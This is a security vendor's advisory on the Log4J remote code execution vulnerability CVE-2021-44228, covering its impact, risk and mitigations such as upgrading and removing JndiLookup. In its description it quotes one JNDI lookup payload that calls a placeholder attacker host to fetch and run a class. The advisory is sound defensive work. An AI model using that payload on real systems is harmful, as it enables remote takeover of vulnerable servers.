Threat Response: Remote Code Execution vulnerability in Log4J library

10-12-2021

Friday 10 December 2021 a new Proof-of-Concept addressing a Remote code Execution (RCE) vulnerability in the Java library ‚log4j‘ [2]. This vulnerability has not been disclosed to the developers of the software upfront. The vulnerability is being tracked as CVE-2021-44228 [3]. In this message, we would like to inform you about the threat and the possible mitigations.

Description

A unauthenticated remote code execution exists in the popular Java library ‚log4j‘. This library is used by many Java-based applications for logging purposes. The vulnerability allows an attacker to execute arbitrary code within the Java process. This is made possible because the log4j library handled ‚formatted messages‘. By means of an accessible input field or special HTTP-request, the attacker can exploit the vulnerability if the data is being logged by Log4j. An example of input that can trigger the exploit is „${jndi:ldap://attacker:443/evil.class“. Whenever this input is logged by log4j, a file could be obtained from the attacker’s server. The obtained file will then be executed by Java.

In short: applications that are remotely accessible, can handle user-input and use log4j (version lower than 2.15.0) to log this input are potentially vulnerable.

Impact

If an attacker is successful in exploiting the vulnerability, they are able to execute arbitrary code and subsequently take over the server running the vulnerable application. All of this can be done remotely and without authentication. From the vulnerable server, the attacker can obtain access to the rest of the network. Because of these reasons, we classify the impact of this vulnerability as high.

Risk

The vulnerable code is located in a popular library present in many software packages, including webserver applications. Because these types of applications are typically accessible directly from the internet, it is trivial for an attacker to access a vulnerable server and attack it. We therefore classify the risk as high.

Mitigation

A new version of log4j, version 2.15.0, is available at this moment [4].

If any of the applications you have built yourself contains the log4j package, we urgently advise to upgrade to the newest version and deploy the new package.

For third-party applications you are using, we advise to contact the vendor for any updates.

If at this very moment upgrading is not possible, there are two mitigation alternatives:

  1. A temporary mitigiation by adding a variable to the configuration of the Java Virtual Machine running the application:
    1. log4j.formatMsgNoLookups=true 
  2. Removal of the class „JndiLookup“ from the Java Classpath (e.g.: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class )

What will Northwave do?

Northwave will monitor any developments regarding this vulnerability. If new critical information about this threat arises, we will reach out to you. If you need additional information you can call us by phone or send us an email.

Northwave will have a check available later today to test whether your environment is vulnerable. If you want to make use of this check, please contact the SOC.

E-mail: [email protected] Do you have an incident right now? Call our CERT number: +31 (0)85 043 7909 or 0800-1744 (alleen vanuit Nederland)

Northwave released a document to check whether you are vulnerable, please find it here: https://github.com/NorthwaveSecurity/log4jcheck/

Sources

[1]: https://github.com/tangxiaofeng7/apache-log4j-poc

[2]: https://logging.apache.org/log4j/2.x/

[3]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228, https://www.randori.com/blog/cve-2021-44228/

[4]: https://logging.apache.org/log4j/2.x/download.html

Disclaimer
Northwave has made every effort to make this information accurate and reliable. However, the information provided is without warranty of any kind and its use is at the sole risk of the user. Northwave does not accept any responsibility or liability for the accuracy, content, completeness, legality or reliability of the information provided. We shall not be liable for any loss or damage of whatever nature, direct or indirect, consequential or other, whether arising in contract, tort or otherwise, which may arise as a result of your use of, or inability to use, this information or any additional information provided by us in direct or indirect relation to the information provided here.